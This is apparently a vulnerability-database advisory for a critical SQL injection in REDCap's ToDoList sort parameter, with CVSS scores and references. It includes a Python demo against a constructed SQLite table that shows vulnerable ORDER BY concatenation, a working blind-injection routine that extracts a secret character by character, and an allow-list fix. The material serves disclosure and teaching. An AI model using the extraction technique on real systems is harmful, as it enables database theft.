CVE-2020-26712
Severity: CRITICAL
REDCap 10.3.4 - SQL Injection via ToDoList Sort Parameter
Title source: llmDescription
REDCap 10.3.4 contains a SQL injection vulnerability in the ToDoList function via the sort parameter. The application appends the user-supplied sort value to a database query without adequate validation, so an attacker can inject SQL through that parameter and compromise the application's databases.
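A sort parameter is a recurring injection point because ORDER BY cannot take a bound parameter, so developers concatenate the value into the query. The following is an added example, not REDCap's code and not the exploit in the referenced repository: it builds a constructed SQLite to-do table, shows the vulnerable concatenation pattern, demonstrates that an unvalidated ORDER BY is enough for blind extraction of data from an unrelated table (row order leaks one bit per request), and shows the allow-list fix. Every table, column and function name below is made up for the demo.

```python
import sqlite3
import string

# Constructed sample data for the demo; not REDCap's real schema or contents.
SAMPLE_TODO = [
    (1, "approve project", "pending"),
    (2, "review data", "done"),
    (3, "archive study", "pending"),
]
SAMPLE_SECRET = "constructed-secret-key"   # what the blind injection will recover


def make_db():
    """Build an in-memory database with a to-do table and an unrelated secrets table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE todo (id INTEGER, task TEXT, status TEXT)")
    conn.executemany("INSERT INTO todo VALUES (?, ?, ?)", SAMPLE_TODO)
    conn.execute("CREATE TABLE secrets (api_key TEXT)")
    conn.execute("INSERT INTO secrets VALUES (?)", (SAMPLE_SECRET,))
    conn.commit()
    return conn


def todo_ids_vulnerable(conn, sort):
    """Vulnerable pattern: the request's sort value is concatenated into ORDER BY.

    ORDER BY cannot take a bound parameter, which is why code reaches for string
    concatenation here; the value must be allow-listed instead (see todo_ids_safe).
    """
    sql = "SELECT id, task, status FROM todo ORDER BY " + sort
    return [row[0] for row in conn.execute(sql).fetchall()]


def oracle(conn, condition):
    """Blind-SQLi oracle: when `condition` is true the rows come back sorted by id
    ([1, 2, 3]); otherwise by task name ([1, 3, 2]). The order leaks one bit."""
    payload = f"CASE WHEN ({condition}) THEN id ELSE task END"
    return todo_ids_vulnerable(conn, payload) == [1, 2, 3]


def leak_secret(conn, max_len=40):
    """Recover the secret one character at a time through the ORDER BY oracle."""
    charset = string.ascii_lowercase + string.digits + "-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = f"(SELECT substr(api_key, {pos}, 1) FROM secrets) = '{ch}'"
            if oracle(conn, cond):
                recovered += ch
                break
        else:
            return recovered   # no character matched: end of string reached
    return recovered


ALLOWED_SORT_COLUMNS = {"id", "task", "status"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def todo_ids_safe(conn, sort, direction="ASC"):
    """Hardened version: the request value must match an allow-list of column
    names and directions; anything else is rejected, never interpolated."""
    if sort not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort!r}")
    direction = direction.upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"unsupported sort direction: {direction!r}")
    sql = f"SELECT id, task, status FROM todo ORDER BY {sort} {direction}"
    return [row[0] for row in conn.execute(sql).fetchall()]


def safe_handler_rejects(conn, sort):
    """True if the hardened handler refuses the given sort value."""
    try:
        todo_ids_safe(conn, sort)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("normal request, sort=task:", todo_ids_vulnerable(db, "task"))
    print("leaked via ORDER BY oracle:", leak_secret(db))
    payload = "CASE WHEN 1=1 THEN id ELSE task END"
    print("hardened handler rejects payload:", safe_handler_rejects(db, payload))
```

The allow-list maps request values onto identifiers the application itself chose; escaping or quoting the value is not a substitute, because an identifier position in ORDER BY accepts arbitrary expressions, as the oracle above relies on.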
References (3)
- Release Notes, Vendor Advisory (x_refsource_misc): https://www.evms.edu/research/resources_services/redcap/redcap_change_log/
- Product, Vendor Advisory (x_refsource_misc): https://www.project-redcap.org/
- Exploit, Third Party Advisory (x_refsource_misc): https://github.com/vuongdq54/RedCap
Scores
CVSS v3: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Attack Vector: NETWORK
EPSS: 0.0211 (percentile 79.5%)
Details
CWE: CWE-89 (Improper Neutralization of Special Elements used in an SQL Command, 'SQL Injection')
Status: published
Products (2)
- vanderbilt/redcap 10.0.20
- vanderbilt/redcap 10.3.4
Published: Jan 12, 2021
Tracked Since: Feb 18, 2026